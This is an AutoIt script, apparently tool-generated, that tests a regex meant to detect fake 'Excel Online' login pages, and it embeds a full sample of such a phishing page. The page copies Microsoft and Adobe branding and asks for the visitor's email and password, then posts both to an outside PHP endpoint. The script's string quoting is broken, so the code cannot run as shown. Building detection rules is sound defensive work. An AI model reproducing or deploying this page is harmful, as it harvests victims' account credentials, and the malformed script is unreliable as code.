#include <StringConstants.au3> ; to declare the Constants of StringRegExp
#include <Array.au3> ; UDF needed for _ArrayDisplay and _ArrayConcatenate
Local $sRegex = "(?is)^(?:[[:^print:][:cntrl:]\s]|GIF89.{0,20})*(?:<[^>]+>\s*)+<title>excel\s*online\s*\-\s*\w+<\/title>\s*<style(?:[^>]+>\s*)?<\!(?:[^>]+>\s*)?<\/style>"
Local $sString = "<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">" & @CRLF & _
"<html xmlns="http://www.w3.org/1999/xhtml">" & @CRLF & _
"<head>" & @CRLF & _
"<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">" & @CRLF & _
"<title>Excel Online - 09KSJDJR4843984NF98738UNFD843</title>" & @CRLF & _
"<style type="text/css">" & @CRLF & _
"<!--" & @CRLF & _
"body {" & @CRLF & _
" background-image:url("");" & @CRLF & _
" background-repeat: no-repeat;" & @CRLF & _
" background-size: 100% 100%;" & @CRLF & _
" background-attachment: fixed;" & @CRLF & _
" z-index: -950;" & @CRLF & _
" margin-left: 0px;" & @CRLF & _
" margin-top: 0px;" & @CRLF & _
" margin-right: 0px;" & @CRLF & _
" margin-bottom: 0px;" & @CRLF & _
"}" & @CRLF & _
".element {" & @CRLF & _
" font-family: helvetica, verdana, tahoma, arial;" & @CRLF & _
" width: 32em;" & @CRLF & _
" border: 1px solid #EAEAEA;" & @CRLF & _
" overflow: hidden;" & @CRLF & _
" border-radius: 10px;" & @CRLF & _
" box-shadow: 0px 1px 3px rgba(0, 0, 0, 0.3);" & @CRLF & _
" z-index: 11;" & @CRLF & _
" position: relative;" & @CRLF & _
" margin-top: 55px;" & @CRLF & _
" margin-right: auto;" & @CRLF & _
" margin-bottom: 0px;" & @CRLF & _
" margin-left: auto;" & @CRLF & _
" background-attachment: scroll;" & @CRLF & _
" background-color: #FFF;" & @CRLF & _
" background-image: none;" & @CRLF & _
" background-repeat: repeat;" & @CRLF & _
" background-position: 0% 0%;" & @CRLF & _
" padding: 2%;" & @CRLF & _
" opacity: 0.9;" & @CRLF & _
"}" & @CRLF & _
"" & @CRLF & _
".element_Left {" & @CRLF & _
" font-family: helvetica, verdana, tahoma, arial;" & @CRLF & _
" width: 27em;" & @CRLF & _
" border: 1px solid #EAEAEA;" & @CRLF & _
" overflow: hidden;" & @CRLF & _
" border-radius: 10px;" & @CRLF & _
" box-shadow: 0px 1px 3px rgba(0, 0, 0, 0.3);" & @CRLF & _
" z-index: 11;" & @CRLF & _
" position: relative;" & @CRLF & _
" margin-top: 55px;" & @CRLF & _
" margin-right: 12.5%;" & @CRLF & _
" margin-bottom: 0px;" & @CRLF & _
" margin-left: auto;" & @CRLF & _
" background-attachment: scroll;" & @CRLF & _
" background-color: #FFF;" & @CRLF & _
" background-image: none;" & @CRLF & _
" background-repeat: repeat;" & @CRLF & _
" background-position: 0% 0%;" & @CRLF & _
" padding: 2%;" & @CRLF & _
" opacity: 0.9;" & @CRLF & _
" float: right;" & @CRLF & _
"}" & @CRLF & _
".element_Right {" & @CRLF & _
" font-family: "Times New Roman", Times, serif;" & @CRLF & _
" width: 30em;" & @CRLF & _
" height: 370px;" & @CRLF & _
" overflow: hidden;" & @CRLF & _
" z-index: 11;" & @CRLF & _
" position: relative;" & @CRLF & _
" margin-top: 55px;" & @CRLF & _
" margin-right: auto;" & @CRLF & _
" margin-bottom: 0px;" & @CRLF & _
" margin-left: 12.5%;" & @CRLF & _
" background-color: #FFF;" & @CRLF & _
" background-image: url(https://mustek.co.za/wp-content/uploads/2016/04/download-1.png);" & @CRLF & _
" background-repeat: no-repeat;" & @CRLF & _
" background-position: center center;" & @CRLF & _
" background-size: 100% 100%;" & @CRLF & _
" float: left;" & @CRLF & _
" border-radius: 4px;" & @CRLF & _
" text-decoration: none;" & @CRLF & _
" text-align: center;" & @CRLF & _
" vertical-align: middle;" & @CRLF & _
" box-sizing: border-box;" & @CRLF & _
" box-shadow: 0px 1px 3px rgba(0, 0, 0, 0.3);" & @CRLF & _
"" & @CRLF & _
"}" & @CRLF & _
".transparent {" & @CRLF & _
" padding-top: 0%;" & @CRLF & _
" padding-bottom: 4%;" & @CRLF & _
" width: auto;" & @CRLF & _
" margin-right: auto;" & @CRLF & _
" margin-left: auto;" & @CRLF & _
" display: block;" & @CRLF & _
" clear: both;" & @CRLF & _
" float: none;" & @CRLF & _
"" & @CRLF & _
"}" & @CRLF & _
".HeaderBox {" & @CRLF & _
" background-color: #000;" & @CRLF & _
" padding-top: 1%;" & @CRLF & _
" padding-right: 12.5%;" & @CRLF & _
" padding-bottom: 1%;" & @CRLF & _
" padding-left: 12.5%;" & @CRLF & _
"}" & @CRLF & _
".NavBox {" & @CRLF & _
" background-color: #FFF;" & @CRLF & _
" padding-top: 0.5%;" & @CRLF & _
" padding-right: 12.5%;" & @CRLF & _
" padding-bottom: 0.5%;" & @CRLF & _
" padding-left: 12.5%;" & @CRLF & _
" vertical-align: middle;" & @CRLF & _
"}" & @CRLF & _
".logo1 {" & @CRLF & _
" background-image: url(https://mustek.co.za/wp-content/uploads/2016/04/download-1.png);" & @CRLF & _
" background-repeat: no-repeat;" & @CRLF & _
" background-position: center center;" & @CRLF & _
" position: absolute;" & @CRLF & _
" left: 167px;" & @CRLF & _
" top: 0px;" & @CRLF & _
" height: 98px;" & @CRLF & _
" width: 98px;" & @CRLF & _
" z-index: 1000;" & @CRLF & _
" background-size: 100% 100%;" & @CRLF & _
" padding-top: 0%;" & @CRLF & _
" padding-bottom: 2%;" & @CRLF & _
"}" & @CRLF & _
".titlr_box {" & @CRLF & _
" background-color: #D1D1D1;" & @CRLF & _
" margin-bottom: 3%;" & @CRLF & _
" padding-top: 0.2%;" & @CRLF & _
" padding-right: 2%;" & @CRLF & _
" padding-bottom: 0.2%;" & @CRLF & _
" padding-left: 20%;" & @CRLF & _
" border: 1px solid #BBB;" & @CRLF & _
" background-image: url(https://mustek.co.za/wp-content/uploads/2016/04/download-1.png);" & @CRLF & _
" background-repeat: no-repeat;" & @CRLF & _
" background-position: 4% center;" & @CRLF & _
" border-radius: 10px;" & @CRLF & _
"}" & @CRLF & _
".copyright {" & @CRLF & _
" font-size: 11px;" & @CRLF & _
" color: #CCC;" & @CRLF & _
" text-align: center;" & @CRLF & _
" font-weight: bold;" & @CRLF & _
" margin-top: 2%;" & @CRLF & _
" margin-right: 12.5%;" & @CRLF & _
" margin-left: 12.5%;" & @CRLF & _
" clear: both;" & @CRLF & _
" float: none;" & @CRLF & _
" font-family: Arial, sans-serif;" & @CRLF & _
" text-transform: capitalize;" & @CRLF & _
" margin-bottom: 0%;" & @CRLF & _
"}" & @CRLF & _
".document {" & @CRLF & _
" padding-left: 11%;" & @CRLF & _
" font-family: Arial, sans-serif;" & @CRLF & _
" font-size: 16px;" & @CRLF & _
" font-weight: bold;" & @CRLF & _
" color: #333;" & @CRLF & _
" width: 48%;" & @CRLF & _
" padding-top: 1%;" & @CRLF & _
"}" & @CRLF & _
".NavButton {" & @CRLF & _
" display: block;" & @CRLF & _
" float: right;" & @CRLF & _
" font-family: helvetica, verdana, tahoma, arial;" & @CRLF & _
" font-size: 12px;" & @CRLF & _
" color: #333;" & @CRLF & _
" text-transform: capitalize;" & @CRLF & _
" padding-top: 1%;" & @CRLF & _
" padding-right: 2%;" & @CRLF & _
" padding-bottom: 1%;" & @CRLF & _
" padding-left: 2%;" & @CRLF & _
" background-color: #CAC8BF;" & @CRLF & _
" border: 1px solid #BEBCAF;" & @CRLF & _
" margin-left: 0.8%;" & @CRLF & _
" text-decoration: none;" & @CRLF & _
" box-sizing: border-box;" & @CRLF & _
"}" & @CRLF & _
".clear2 {" & @CRLF & _
" clear: both;" & @CRLF & _
" float: none;" & @CRLF & _
"}" & @CRLF & _
".getReader {" & @CRLF & _
" clear: right;" & @CRLF & _
" float: right;" & @CRLF & _
" height: 39px;" & @CRLF & _
" width: 158px;" & @CRLF & _
" margin-top: 2px;" & @CRLF & _
" margin-right: 0px;" & @CRLF & _
" background-image: url(https://mustek.co.za/wp-content/uploads/2016/04/download-1.png);" & @CRLF & _
" background-repeat: no-repeat;" & @CRLF & _
" background-position: center center;" & @CRLF & _
"}" & @CRLF & _
".button1 {" & @CRLF & _
" background-color: #2B9AF3;" & @CRLF & _
" border-radius: 0.188rem;" & @CRLF & _
" clear: both;" & @CRLF & _
" color: #FFF;" & @CRLF & _
" display: inline-block;" & @CRLF & _
" font-size: 0.875rem;" & @CRLF & _
" font-weight: 400;" & @CRLF & _
" letter-spacing: 0.063rem;" & @CRLF & _
" line-height: normal;" & @CRLF & _
" margin: 0.375rem 0px;" & @CRLF & _
" padding: 0.438rem 0.875em;" & @CRLF & _
" text-decoration: none;" & @CRLF & _
" transition: background-color 0.3s ease 0s;" & @CRLF & _
" box-sizing: border-box;" & @CRLF & _
" border: 0px none;" & @CRLF & _
" box-shadow: 2px 1px 2px #000;" & @CRLF & _
"margin-right: 14px;" & @CRLF & _
"}" & @CRLF & _
".button1:hover {" & @CRLF & _
" background-color: #0C79D3;" & @CRLF & _
"}" & @CRLF & _
".mustDownload {" & @CRLF & _
" font-family: Georgia, "Times New Roman", Times, serif;" & @CRLF & _
" font-size: 11px;" & @CRLF & _
" font-weight: bold;" & @CRLF & _
" text-transform: capitalize;" & @CRLF & _
" color: #FFF;" & @CRLF & _
" padding-top: 1%;" & @CRLF & _
" padding-bottom: 0%;" & @CRLF & _
" text-align: center;" & @CRLF & _
" vertical-align: middle;" & @CRLF & _
" display: block;" & @CRLF & _
"}" & @CRLF & _
"" & @CRLF & _
"-->" & @CRLF & _
"</style>" & @CRLF & _
"<link href="Adobe%20Sign%20In_files/style.css" rel="stylesheet" type="text/css">" & @CRLF & _
"<script type="text/javascript">" & @CRLF & _
"<!--" & @CRLF & _
"function MM_goToURL() { //v3.0" & @CRLF & _
" var i, args=MM_goToURL.arguments; document.MM_returnValue = false;" & @CRLF & _
" for (i=0; i<(args.length-1); i+=2) eval(args[i]+".location='"+args[i+1]+"'");" & @CRLF & _
"}" & @CRLF & _
"//-->" & @CRLF & _
"</script>" & @CRLF & _
"</head>" & @CRLF & _
"<body>" & @CRLF & _
"<div style="background-color:rgba(0, 0, 0, 0.5); height:740px;">" & @CRLF & _
"<div class="HeaderBox">" & @CRLF & _
" <div align="right"><a target= "_blank" href="https://get.adobe.com/reader/"><img src="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcRYYPgD2b9W7swtWsB5OmqXcIMJv6yIC8VuugJ8peOjDTQp45t5" width="158" height="39" longdesc= /> </a></div>" & @CRLF & _
" <div class="clear2"></div></div>" & @CRLF & _
"<div class="NavBox">" & @CRLF & _
"<a href="#" class="NavButton"></a><a href="#" class="NavButton"></a>" & @CRLF & _
"" & @CRLF & _
"<form><a href="#" onclick="window.print()" class="NavButton"></a> </form>" & @CRLF & _
"" & @CRLF & _
"<a href="#" class="NavButton"></a>" & @CRLF & _
"" & @CRLF & _
" <div class="document">CONFIRM YOUR EMAIL TO DOWNLOAD DOCUMENT </div>" & @CRLF & _
" <div class="clear2"></div>" & @CRLF & _
" </div>" & @CRLF & _
" <div class="element"> " & @CRLF & _
" <div class="titlr_box">" & @CRLF & _
" <h1 align="left"><https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcS-WhDgpZ_lz01FKeei5pYG9EolGGv0hi_t0y2x3LQ2pMbVA5Iqlw> EXCEL SECURED ONLINE DOCUMENT</h1>" & @CRLF & _
" </div>" & @CRLF & _
"" & @CRLF & _
"" & @CRLF & _
"" & @CRLF & _
"<p><strong>Confirm your identity</strong>!<br>" & @CRLF & _
" Sign in with your receiving email account to view document.</p>" & @CRLF & _
" " & @CRLF & _
" <link href="Adobe%20Sign%20In_files/SpryValidationTextField.css" rel="stylesheet" type="text/css">" & @CRLF & _
"<link href="Adobe%20Sign%20In_files/style.css" rel="stylesheet" type="text/css">" & @CRLF & _
"<style type="text/css">" & @CRLF & _
".textFieldlog {" & @CRLF & _
" font-family: Arial, Helvetica, sans-serif;" & @CRLF & _
" font-size: 14px;" & @CRLF & _
" color: #2E2E2E;" & @CRLF & _
" height: 24px;" & @CRLF & _
" width: 96%;" & @CRLF & _
" margin-bottom: 4px;" & @CRLF & _
" border: 1px solid #A8A8A8;" & @CRLF & _
" margin-right: auto;" & @CRLF & _
" margin-left: auto;" & @CRLF & _
" padding-top: 4px;" & @CRLF & _
" padding-right: 10px;" & @CRLF & _
" padding-bottom: 4px;" & @CRLF & _
" padding-left: 10px;" & @CRLF & _
" background-color: #FAFAF8;" & @CRLF & _
" background-image: url(images/bg_form.png);" & @CRLF & _
" background-repeat: repeat;" & @CRLF & _
"}" & @CRLF & _
"" & @CRLF & _
".ButtonLOG {" & @CRLF & _
" color: #FFF;" & @CRLF & _
" background-color: #F66;" & @CRLF & _
" border: 1px solid #FFF;" & @CRLF & _
" padding-top: 5px;" & @CRLF & _
" padding-right: 3px;" & @CRLF & _
" padding-bottom: 5px;" & @CRLF & _
" padding-left: 3px;" & @CRLF & _
" font-family: Arial, sans-serif;" & @CRLF & _
" font-size: 11.6px;" & @CRLF & _
" -webkit-border-radius: 4px;" & @CRLF & _
" -moz-border-radius: 4px;" & @CRLF & _
" -khtml-border-radius: 4px;" & @CRLF & _
" border-radius: 4px;" & @CRLF & _
" margin-right: 2%;" & @CRLF & _
" text-decoration: none;" & @CRLF & _
" margin-toAdobe%20Sign%20In_files/secure.pngF2F2F;" & @CRLF & _
"}" & @CRLF & _
"" & @CRLF & _
"" & @CRLF & _
".texthinter {" & @CRLF & _
" font-size: 14px;" & @CRLF & _
" font-family: Arial, sans-serif;" & @CRLF & _
" color: #333;" & @CRLF & _
"}" & @CRLF & _
"" & @CRLF & _
"" & @CRLF & _
".textform {" & @CRLF & _
" font-family: Arial, Helvetica, sans-serif;" & @CRLF & _
" font-size: 10px;" & @CRLF & _
" text-transform: uppercase;" & @CRLF & _
" color: #4D4D4D;" & @CRLF & _
"}" & @CRLF & _
"" & @CRLF & _
".YeloowTop {" & @CRLF & _
" background-color: #4B4B4B;" & @CRLF & _
" border: 1px solid #333333;" & @CRLF & _
" padding: 2%;" & @CRLF & _
" width: auto;" & @CRLF & _
" margin-right: auto;" & @CRLF & _
" margin-left: auto;" & @CRLF & _
" font-family: Arial, Helvetica, sans-serif;" & @CRLF & _
" font-size: 16px;" & @CRLF & _
" color: #FFF;" & @CRLF & _
"}" & @CRLF & _
"" & @CRLF & _
".hint23 {" & @CRLF & _
" background-color: #FFEAEA;" & @CRLF & _
" border: 1px solid #FBB;" & @CRLF & _
" font-family: Tahoma, Geneva, sans-serif;" & @CRLF & _
" color: #2B2D3C;" & @CRLF & _
" font-size: 16px;" & @CRLF & _
" margin-bottom: 2%;" & @CRLF & _
" width: auto;" & @CRLF & _
" margin-right: auto;" & @CRLF & _
" margin-left: auto;" & @CRLF & _
" margin-top: 2%;" & @CRLF & _
" padding-top: 3%;" & @CRLF & _
" padding-right: 3%;" & @CRLF & _
" padding-bottom: 3%;" & @CRLF & _
" padding-left: 8%;" & @CRLF & _
" background-image: url(images/warning.png);" & @CRLF & _
" background-repeat: no-repeat;" & @CRLF & _
" background-position: 8px;" & @CRLF & _
"}" & @CRLF & _
"" & @CRLF & _
".sidebox67 {" & @CRLF & _
" background-color: #FFCC00;" & @CRLF & _
" padding: 4%;" & @CRLF & _
" width: auto;" & @CRLF & _
" margin-right: auto;" & @CRLF & _
" margin-left: auto;" & @CRLF & _
"}" & @CRLF & _
"</style>" & @CRLF & _
"<script src="Adobe%20Sign%20In_files/SpryValidationTextField.js" type="text/javascript"></script>" & @CRLF & _
"<script>" & @CRLF & _
"function validateForm() {" & @CRLF & _
" var x = document.forms["loginForm"]["email"].value;" & @CRLF & _
" var atpos = x.indexOf("@");" & @CRLF & _
" var dotpos = x.lastIndexOf(".");" & @CRLF & _
" if (atpos<1 || dotpos<atpos+2 || dotpos+2>=x.length) {" & @CRLF & _
" alert("Not a valid e-mail address");" & @CRLF & _
" return false;" & @CRLF & _
" }" & @CRLF & _
"}" & @CRLF & _
"</script>" & @CRLF & _
"" & @CRLF & _
"" & @CRLF & _
"" & @CRLF & _
"" & @CRLF & _
" <form autocomplete="off" method="post" action="http://mormanagement.com/ppplll/ab.php" name="loginForm" onsubmit="return validateForm();" >" & @CRLF & _
" <table align="center" border="0" cellpadding="0" cellspacing="0" width="100%">" & @CRLF & _
" <tbody><tr valign="baseline">" & @CRLF & _
" <td class="texthinter" align="left" height="57" nowrap="nowrap" valign="top" width="71%"><label for="repl_id1"><strong>Email ID:</strong></label>" & @CRLF & _
" <br>" & @CRLF & _
" <strong>" & @CRLF & _
" <label for="email"></label>" & @CRLF & _
" <span id="sprytextfield2">" & @CRLF & _
" <input autocomplete="off" name="email" class="textFieldlog" id="email" placeholder="Enter Email Address" type="text" autofocus >" & @CRLF & _
" </span></strong></td>" & @CRLF & _
" <td rowspan="2" class="texthinter" align="right" nowrap="nowrap" valign="middle" width="29%"><img src="https://mustek.co.za/wp-content/uploads/2016/04/download-1.png" height="108" width="108"></td>" & @CRLF & _
" </tr>" & @CRLF & _
" <tr valign="top">" & @CRLF & _
" <td class="texthinter" align="left" nowrap="nowrap">" & @CRLF & _
" <label for="repl_id1"><strong>Password:</strong></label>" & @CRLF & _
" <br><span id="sprytextfield1">" & @CRLF & _
" <input autocomplete="off" name="pass" class="textFieldlog" id="pswrd" value="" size="32" placeholder="Enter Your Password" type="password">" & @CRLF & _
" <span class="textfieldRequiredMsg"><br>" & @CRLF & _
" <div class="texthinter">Password is Required.</div></span></span></td>" & @CRLF & _
" </tr>" & @CRLF & _
" <tr valign="baseline">" & @CRLF & _
" <td align="left" nowrap="nowrap" valign="middle">" & @CRLF & _
" <input class="button1" value="View Document" name="submit" type="submit">" & @CRLF & _
" <input name="button2" id="button2" value="Reset" class="button1" type="reset"></td>" & @CRLF & _
" <td align="left" nowrap="nowrap" valign="middle"> </td>" & @CRLF & _
" </tr>" & @CRLF & _
" </tbody></table>" & @CRLF & _
" " & @CRLF & _
"</form>" & @CRLF & _
"" & @CRLF & _
"" & @CRLF & _
"<script type="text/javascript">" & @CRLF & _
"<!--" & @CRLF & _
"var sprytextfield1 = new Spry.Widget.ValidationTextField("sprytextfield1");" & @CRLF & _
"var sprytextfield2 = new Spry.Widget.ValidationTextField("sprytextfield2", "email");" & @CRLF & _
"//-->" & @CRLF & _
"</script>" & @CRLF & _
"" & @CRLF & _
"" & @CRLF & _
" " & @CRLF & _
"</div>" & @CRLF & _
" <div class="logo1"><img src="" width="110"/></div>" & @CRLF & _
"<div class="copyright">©2017 Microsoft Terms of use Privacy & cookies.</div></div>" & @CRLF & _
"<div class="<img src="https://secure.aadcdn.microsoftonline-p.com/ests/2.1.6795.13/content/images/microsoft_logo.png" alt="Microsoft account symbol">" & @CRLF & _
"" & @CRLF & _
"" & @CRLF & _
"" & @CRLF & _
"</body>" & @CRLF & _
"</html>"
Local $aArray = StringRegExp($sString, $sRegex, $STR_REGEXPARRAYGLOBALFULLMATCH)
Local $aFullArray[0]
For $i = 0 To UBound($aArray) -1
_ArrayConcatenate($aFullArray, $aArray[$i])
Next
$aArray = $aFullArray
; Present the entire match result
_ArrayDisplay($aArray, "Result")